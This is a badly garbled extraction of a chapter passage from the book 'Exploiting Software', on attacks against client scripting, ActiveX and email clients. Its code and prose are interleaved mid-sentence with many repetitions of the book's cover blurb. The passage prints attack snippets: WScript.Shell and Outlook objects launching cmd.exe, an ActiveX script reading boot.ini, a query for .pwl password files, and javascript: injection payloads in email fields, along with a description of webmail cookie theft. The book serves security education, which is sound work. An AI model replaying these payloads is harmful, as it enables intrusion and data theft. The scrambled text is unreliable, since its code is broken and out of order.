"The 'IloveYou' virus contaminated over 1 million computers in 5 hours."[4]
[4]US Office of the Undersecretary of Defense, February 2001.
•Table of Contents
Client programs such as Microsoft Excel, Word, or Internet Explorer are capable of executing
• Index
code that is downloaded from untrusted sources. Because of this, they create an environment
Exploiting Software How to Break Code
in which viruses and worms can thrive. In fact, until recently, the fastest spreading and most
ByGreg Hoglund,Gary McGraw
widespread viruses of all time all exploited scripting problems: Concept (1997), Melissa (1999), IloveYou (2000), NIMDA (2002). The key to attacking a client program is identifying thePublisher:local objectsAddisonandWesleyAPI calls that a client script can access. Many of these library functions canPubbeDate:exploitedFebruaryto17,gain2004access to the local system.
ISBN: 0-201-78695-8
Consider a target network of a few thousand nodes. Realize that many of these systems are
Pages: 512
running the same client software, the same version of Windows, the same e-mail clients, and so forth. This creates a monoculture environment in which a single worm can wipe out (or, worse yet, silently own) a substantial percentage of the target network. Using reverse engineering tricks (described in Chapter 3), an attacker can identify weak library calls and
develop a virus that will install backdoors, e-mail sniffers, and database attack tools. How does software break? How do attackers make software break on purpose? Why are
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
What tools can be used to break software? This book provides the answers.
* Attack Example: Excel Host() Function
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniquesTheHost() usedfunction,by badwhenguysembeddedto breakinsoftwareoffice documents,. If you wantcantobeprotectusedyourin ansofattwareack. from attack, you must first learn how real attacks are really carried out.
This must-have book may shock you—and it will certainly educate you.Getting beyond the
* Attack Example: WScript.Shell
script kiddie treatment found in many hacking books, you will learn about
The wscript engine is a useful attack target that can access the Windows registry and run shell
Why software exploit will continue to be a serious problem commands:
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Myobj = new ActiveXObject("WScript.Shell");
Techniques for crafting malicious input
Myobj.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /C DIR C:\\ /A /P /S");
The technical details of buffer overflows
Rootkits
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
TheFileSystemObject is very commonly used by scripted worms. It can be used to manipulate both ASCII and binary files on the system.
* Attack Example: Wscript.Network
The Wscript network call can be used to map network drives.
* Attack Example: Scriptlet.TypeLib
TheTypeLib scriptlet can be used to create files. An attacker can use this to place script copies in certain locations on network drives so they will be executed on reboot.
•Table of Contents
•Index
Exploiting Software How to Break Code
Auditing for Weak Local Calls
ByGreg Hoglund,Gary McGraw
A good way to begin applying this technique is to look for controls that access the local system
Publisher: Addison Wesley
or the local network, including local system calls. A short and incomplete search of the registry
Pub Date: February 17, 2004
under Windows XP reveals some of the DLLs that are responsible for servicing interesting
scriptingISBNcalls:0-201-78695-8 Pages: 512
How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.
scrrun.dll
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
techniques used by bad guys to break software. If you want to protect your software from
Scripting.FilesystemObject
attack, you must first learn how real attacks are really carried out.
ScriptingThis must-have.Encoderbook may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
wbemdisp.dll
Why software exploit will continue to be a serious problem
WbemScripting.SWbemDateTime.1
When network security mechanisms do not work
WbemScripting.SWbemObjectPath.1
Attack patterns
WbemScripting.SWbemSink.1
Reverse engineering
WbemScripting.SWbemLocator.1
Classic attacks against server software
Surprising attacks against client software
wshext.dll
Techniques for crafting malicious input
Scripting.Signer
The technical details of buffer overflows
Rootkits
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break Running a dependency tree analysis on scrrun.dll reveals the inherent capability of the DLL. In
software.
other words, such an exercise tells what scripts are able to do given the right instructions. The "depends" tool is useful for determining what calls can be made from a particular DLL. The tool comes with the standard development tools supplied by Microsoft (Figure 5-2).
Figure 5-2. A screen shot of the "depends" tool results for the
SCRRUN DLL. Looking at the dependencies reveals information that
can be leveraged in an attack.
[View full size image]
•
•
Exploiting
ByGreg Hoglund
Publisher
Pub Date
ISBN
Pages
How does
are
firewalls,
guys?
What tools
Exploiting
and
techniques
from
attack, you
This must
the
script kiddie treatment found in many hacking books, you will learn about
Using depends, we can determine that SCRRUN uses the following functions from imported Why software exploit will continue to be a serious problem
DLLs:
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
ADVAPI32.DLL
Techniques for crafting malicious input
IsTextUnicode
The technical details of buffer overflows
RegCloseKey
Rootkits
RegCreateKeyA
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software.
RegDeleteKeyA
RegEnumKeyA
RegOpenKeyA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryValueA
RegSetValueA
RegSetValueExA
•Table of Contents
•Index
Exploiting Software How to Break Code
ByGreg Hoglund,Gary McGraw
Publisher: Addison Wesley
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
Pages: 512
KERNEL32.DLL
CloseHandle
How does software break? How do attackers make software break on purpose? Why are
CompareStringA
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
What tools can be used to break software? This book provides the answers.
CompareStringW
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
CopyFileA
techniques used by bad guys to break software. If you want to protect your software from
attack, you must first learn how real attacks are really carried out.
CopyFileW
This must-have book may shock you—and it will certainly educate you.Getting beyond the
CreateDirectoryA
script kiddie treatment found in many hacking books, you will learn about
CreateDirectoryW
Why software exploit will continue to be a serious problem
CreateFileA
When network security mechanisms do not work
CreateFileW
Attack patterns
DeleteCriticalSection
Reverse engineering
DeleteFileA
Classic attacks against server software
DeleteFileW
Surprising attacks against client software
EnterCriticalSection
Techniques for crafting malicious input
FileTimeToLocalFileTimeThe technical details of buffer overflows
FileTimeToSystemTimeRootk ts
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
FindClose software.
FindFirstFileA
FindFirstFileW
FindNextFileA
FindNextFileW
FreeLibrary
GetDiskFreeSpaceA
GetDiskFreeSpaceW
GetDriveTypeA
•Table of Contents
GetDriveTypeW
•Index
Exploiting Software How to Break Code
GetFileAttributesA
ByGreg Hoglund,Gary McGraw
GetFileAttributesW
Publisher: Addison Wesley
GetFileInformationByHandle
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
GetFileType
Pages: 512
GetFullPathNameA
GetFullPathNameW
How does software break? How do attackers make software break on purpose? Why are
GetLastError
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
What tools can be used to break software? This book provides the answers.
GetLocaleInfoA
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
GetLogicalDrives
techniques used by bad guys to break software. If you want to protect your software from
attack, you must first learn how real attacks are really carried out.
GetModuleFileNameA
This must-have book may shock you—and it will certainly educate you.Getting beyond the
GetModuleHandleA
script kiddie treatment found in many hacking books, you will learn about
GetProcAddress
Why software exploit will continue to be a serious problem
GetShortPathNameA
When network security mechanisms do not work
GetShortPathNameW
Attack patterns
GetStdHandle
Reverse engineering
GetSystemDirectoryA
Classic attacks against server software
GetSystemDirectoryW
Surprising attacks against client software
GetTempPathA
Techniques for crafting malicious input
GetTempPathW
The technical details of buffer overflows
GetTickCount
Rootkits
GetUserDefaultLCID
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software.
GetVersion
GetVersionExA
GetVolumeInformationA
GetVolumeInformationW
GetWindowsDirectoryA
GetWindowsDirectoryW
InitializeCriticalSection
InterlockedDecrement
•Table of Contents
InterlockedIncrement
•Index
Exploiting Software How to Break Code
LCMapStringA
ByGreg Hoglund,Gary McGraw
LCMapStringW
Publisher: Addison Wesley
LeaveCriticalSection
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
LoadLibraryA
Pages: 512
MoveFileA
MoveFileW
How does software break? How do attackers make software break on purpose? Why are
MultiByteToWideChar
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
What tools can be used to break software? This book provides the answers.
ReadFile
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
RemoveDirectoryA
techniques used by bad guys to break software. If you want to protect your software from
attack, you must first learn how real attacks are really carried out.
RemoveDirectoryW
This must-have book may shock you—and it will certainly educate you.Getting beyond the
SetErrorMode
script kiddie treatment found in many hacking books, you will learn about
SetFileAttributesA
Why software exploit will continue to be a serious problem
SetFileAttributesW
When network security mechanisms do not work
SetFilePointer
Attack patterns
SetLastError
Reverse engineering
SetVolumeLabelA
Classic attacks against server software
SetVolumeLabelW
Surprising attacks against client software
WideCharToMultiByte
Techniques for crafting malicious input
WriteConsoleW
The technical details of buffer overflows
WriteFile
Rootkits
lstrcatA
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software.
lstrcatW
lstrcpyA
lstrcpyW
lstrlenA
USER32.DLL
CharNextA
LoadStringA
wsprintfA
• Table of Contents
• Index
Exploiting Software How to Break Code
ByGreg Hoglund,Gary McGraw
OLE32.DLL
Publisher: Addison Wesley
CLSIDFromProgID
Pub Date: February 17, 2004
CLSIDFromStringI BN: 0-201-78695-8
Pages: 512
CoCreateInstance
CoGetMalloc
StringFromCLSID
How does software break? How do attackers make software break on purpose? Why are
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
StringFromGUID2
What tools can be used to break software? This book provides the answers.
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
techniques used by bad guys to break software. If you want to protect your software from
OLEAUT32.DLL
attack, you must first learn how real attacks are really carried out.
This must2 (0x0002)-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
4 (0x0004)
Why software exploit will continue to be a serious problem
5 (0x0005)
When network security mechanisms do not work
6 (0x0006)
Attack patterns
7 (0x0007)
Reverse engineering
9 (0x0009)
Classic attacks against server software
10 (0x000A)
Surprising attacks against client software
15 (0x000F)
Techniques for crafting malicious input
16 (0x0010)
The technical details of buffer overflows
21 (0x0015)
Rootkits
22 (0x0016)
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software.
72 (0x0048)
100(0x0064)
101(0x0065)
102(0x0066)
147 (0x0093)
161(0x00A1)
162(0x00A2)
165(0x00A5)
166(0x00A6)
•Table of Contents
•Index
183(0x00B7)
Exploiting Software How to Break Code
186 (0x00BA)
ByGreg Hoglund,Gary McGraw
192 (0x00C0)
Publisher: Addison Wesley
Pub Date: February 17, 2004
216 (0x00D8)
ISBN: 0-201-78695-8
Pages: 512
MSVCRT.DLL
??2@YAPAXI@Z
How does software break? How do attackers make software break on purpose? Why are firewalls,??3@YAXPAX@Zintrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.
__dllonexit
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniquesadjustusedfdivby bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.
_initterm
This must-have book may shock you—and it will certainly educate you.Getting beyond the
script kiddie treatment found in many hacking books, you will learn about
_ismbblead
_itoa
Why software exploit will continue to be a serious problem
_itow
When network security mechanisms do not work
_mbsdec
Attack patterns
_mbsicmp
Reverse engineering
_Clambsnbcpysic attacks against server software
_Surprismbsnbicmpng attacks against client software
Techniques for crafting malicious input
_onexit
The technical details of buffer overflows
_purecall
Rootkits
_wcsicmp
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
_wcsnicmp software.
free
isalpha
iswalpha
malloc
memmove
rand
sprintf
srand
•Table of Contents
strncpy
•Index
Exploiting Software How to Break Code
tolower
ByGreg Hoglund,Gary McGraw
toupper
Publisher: Addison Wesley
wcscmp
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
wcscpy
Pages: 512
wcslen
wcsncpy
How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
What tools can be used to break software? This book provides the answers.
VERSION.DLL
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
GetFileVersionInfoA
techniques used by bad guys to break software. If you want to protect your software from
attack, you must first learn how real attacks are really carried out.
GetFileVersionInfoSizeA
This must-have book may shock you—and it will certainly educate you.Getting beyond the
GetFileVersionInfoSizeW
script kiddie treatment found in many hacking books, you will learn about
GetFileVersionInfoW
Why software exploit will continue to be a serious problem
VerQueryValueA
When network security mechanisms do not work
VerQueryValueW
Attack patterns
Reverse engineering
Classic attacks against server software
This list is interesting because it shows what scrrun.dll might be able to do on behalf of a
script. Not all the calls listed here are necessarily exposed directly to a script, but many of
Surprising attacks against client software
them are. Think in terms of the lock-picking analogy we discuss in previous chapters. A script
provides one way of picking the logical locks between you and the library call you're after.
Techniques for crafting malicious input
Many of these library calls will be exploitable from a script, given the right circumstances.
The technical details of buffer overflows
WebRootkitsBrowsers and ActiveX
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
The modern Web browser has evolved into an execution sandbox for mobile code. The browser software.
is thus a fat client that runs largely untrusted code. This might not be such a big problem, except that the browser is usually not properly segmented from the host OS. Even "secure" mobile code systems, like Java VMs, have histories of flaws that allowed attackers to circumvent sandbox security.[5]
[5] For more on mobile code security, sandboxing, and related security problems, see Securing Java
[McGraw and Felten, 1998].
In the case of Microsoft technology, the problem is many times worse than with other systems.
The COM/DCOM technology (sometimes packaged as ActiveX, and most recently referred to as
.NET) exposes enormous couplings between host system services and potentially malicious code. Exploits have been unearthed by the dozens in the layer between the browser and
ActiveX. Many of these vulnerabilities allow scripts to access the local file system. To
understand the depth of this problem, take any ActiveX function that accepts a URL and supply
a local file instead. Many of the relative path problems that we outlined in previous chapters
can be directly applied. Attempts to encode the filename in various ways combined with
relative path traversal will yield successful exploits. ActiveX is a fertile hunting ground for
•
Table of Contents
exploits.
•Index
Exploiting Software How to Break Code
In a way, the layer between scripts and the OS provides yet another trust zone where classic ByinputGregattacksHoglund,canGarybeMcGrawlaunched. As a result, most of the generic tricks that apply to server input (seeChapter 4) can be applied here as well, with the twist being that this time we target the
client.
Publisher: Addison Wesley
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
Pages: 512
Attack Pattern: Passing Local Filenames to Functions That
Expect a URL
How does software break? How do attackers make software break on purpose? Why are Use local filenames with functions that expect to consume a URL. Find interesting
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? connections.
What tools can be used to break software? This book provides the answers.
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
techniques used by bad guys to break software. If you want to protect your software from
* Attack Example: Local Filenames and the ActiveX Preloader
attack, you must first learn how real attacks are really carried out.
Microsoft ships a module with Internet Explorer called the preloader. This module can be This must-have book may shock you—and it will certainly educate you.Getting beyond the
accessed fromtreatmentscript to read files on the local hard drive. The Javascript code follows: script kiddie found in many hacking books, you will learn about
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
<script LANGUAGE="JavaScript">
Classic attacks against server software
<!— Surprising attacks against client software
function attack()
Techniques for crafting malicious input
{ The technical details of buffer overflows
preloaderRootkits .Enable=0;
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break preloader.URL = "c:\\boot.ini";
<a href="javascript:attack()">click here to get boot.ini file</a>
•Table of Contents
•Index
Exploiting Software How to Break Code
ByGreg Hoglund,Gary McGraw
* Attack Example: The Internet Explorer GetObject() Call
Publisher: Addison Wesley
Internet Explorer includes a function call that can be used in any number of attacks:
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
Pages: 512
How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? *WhatAttacktoolsExample:c n be usedixssoto break.querysoftware?ActiveXThisObjectbook provides the answers.
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and Yet another ActiveX object suffers from similar problems:
techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
nn=new ActiveXObject("ixsso.query");
Attack patterns
nn.Catalog="System";
Reverse engineering
nn.query='@filename = *.pwl ';
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
ActiveX makes a potent ally to attackers.
The technical details of buffer overflows
E-mailRootkitsInjection
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
Pervasive messaging systems also present opportunities to extend the idea of client-side software.
injection. Messaging systems in general are designed to take a block of data and place it in a target environment where it can then be interpreted. Consider pagers, SMS messaging, and e- mail systems. An attacker can easily explore the input space of a message by injecting character sequences and observing the result. In the case of e-mail, the client program may be very complex, at least as complex as a Web browser interface. This means that the same tricks that can be applied to a client-side injection against a browser terminal can also be applied in an e-mail message.
The content to be injected into a message may exist in any part of the mail header or body.
This may include the e-mail subject, recipient field, or even the resolved DNS name of a host.
Attack Pattern: Meta-characters in E-mail Header
•Table of Contents
Meta-characters can be supplied in an e-mail header and may be consumed by the
•
Index
client software to interesting effect.
Exploiting Software How to Break Code
ByGreg Hoglund,Gary McGraw
Publisher: Addison Wesley
[6]
* Attack Example: Meta-characters and the FML Mailing List Archive
Pub Date: February 17, 2004
[6]
Discovery of this problem is attributed Wichert Akkerman (wichert@wiggy.net).
ISBN: 0-201-78695-8
Pages: 512
When the FML application generates an archive index of stored messages, it blindly includes the subject header and fails to strip any embedded script or HTML codes. The result is an index report that, when viewed in a browser terminal, includes the attacker-supplied script codes.
Similar attacks can be carried out against the Subject field, the FROM field (especially with
HTML), the TO field (HTML again), and the mail body itself.
ow does software break? How do attackers make software break on purpose? Why are
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
What tools can be used to break software? This book provides the answers.
* Attack Example: Outlook XP and HTML on Reply or Forward
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
techniques used by bad guys to break software. If you want to protect your software from Outlook XP will run HTML embedded in an e-mail body when the user chooses reply or attack, you must first learn how real attacks are really carried out.
forward. The following HTML snippet is interesting to try:
This must-have book may shock you—and it will certainly educate you.Getting beyond the
script kiddie treatment found in many hacking books, you will learn about
Why software exploit will continue to be a serious problem
Microsoft's Outlook application object provides a powerful control that exposes system-level command execution. This object is used by many virus writers to create a propagation vector:
How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.
NN = MySession.Session.Application.CreateObject("Wscript.Shell");
This must-have book may shock you—and it will certainly educate you.Getting beyond the
script kiddie treatment found in many hacking books, you will learn about
NN.Run("c:\\WINNT\\SYSTEM32\\CMD.EXE /C dir");
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Visual Basic can also be used to access this functionality. Note that VB access to Microsoft
problems is common. Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software.
Pages: 512
ISBN: 0-201-78695-8
Set myApp = CreateObject("Outlook.Application")
MyApp.CreateObject("Wscript.Shell");
• Table of Contents
• Index
Exploiting Software How to Break Code
ByGreg Hoglund,Gary McGraw
* Attack Example: Microsoft Outlook View Control
Publisher: Addison Wesley
Pub Date: February 17, 2004
The "selection" property of the Outlook View Control exposes the user's e-mail to a script, as well as exposes the Outlook Application Object. To create an Outlook View Control and a script that lists the contents of the C: drive, try this:
How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
techniques used by bad guys to break software. If you want to protect your software from
<object
attack, you must first learn how real attacks are really carried out.
class>
This must-have book may shock you—and it will certainly educate you.Getting beyond the
script kiddie treatment found in many hacking books, you will learn about
<param name="folder" value="Inbox">
</object>
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
<script>
Attack patterns
Reverse engineering
functionClassicmyfunc()attacks against server software
{ Surprising attacks against client software
Techniques for crafting malicious input
// Do something evil here.
The technical details of buffer overflows mySelection = o1.object.selection;
Rootkits
myItem = mySelection.Item(1);
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
A remote user can create a malicious HTML-based e-mail message such that when the
message is viewed, arbitrary code is executed by the target user's browser. The code will
Publisher: Addison Wesley
appear to originate from the mail server and will thus be able to access the user's Web mail
Pub Date: February 17, 2004
cookies and forward those cookies to another location. Because the e-mail is being viewed from a trusted server (you trust your e-mail server, right?) the browser trusts the e-mail server. This includes extending trust to any embedded script. Clearly arbitrary e-mail messages themselves should not be trusted. This is a serious flaw in the design of the product.
Using the right kind of scripts an attacker can, for example, steal the cookies associated with a Web session. In many cases, if an attacker gets the right cookies, the same rights and privilegHow does assofthewareoriginbrealk?userHowwilldobeattransferredackersmaketosoftwarethe attackerbreak.Thus,on purpose?after obtainingWhy arethe cookies,firewalls,theintrusionattackerdetectioncan "impersonate"systems, andtheantivirusoriginalsoftwuserarendnotreadkeeptheirnge-outmailthe. bad guys? What tools can be used to break software? This book provides the answers.
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
techniques used by bad guys to break software. If you want to protect your software from
attack, you must first learn how real attacks are really carried out.
At one time, a remote user could place Javascript or VBscript within certain HTML tags to
circumvent the filtering that Baltimore's MailSweeper uses. For example, the following two This must-have book may shock you—and it will certainly educate you.Getting beyond the
HTML tags were not properly filtered by the product:
script kiddie treatment found in many hacking books, you will learn about
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
<A HREF="javascript:alert('This is an attack')">Click here</A>
Classic attacks against server software
<IMG SRC="javascript:alert('This is an attack')">
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
* Attack Example: Hotmail Java Tag Filtering
Rootkits
In an older versionSoftware Hotmail, users could embed script in the FROM field when they sent e- Exploiting is filled with the tools, concepts, and knowledge necessary to break
mail. This would not be filtered. For example, an attack might involve pasting the following software.
script into the FROM field:
a background=javascript:alert('this is an attack') @hotmail.com
•Table of Contents
•Index
Exploiting Software How to Break Code
ByGreg Hoglund,Gary McGraw
Publisher: Addison Wesley
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
Pages: 512
How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
FileTimeToSystemTime
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Rootkits
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
The technical details of buffer overflows
preloader
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Reverse engineering
Surprising attacks against client software
The technical details of buffer overflows 
Rootkits
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits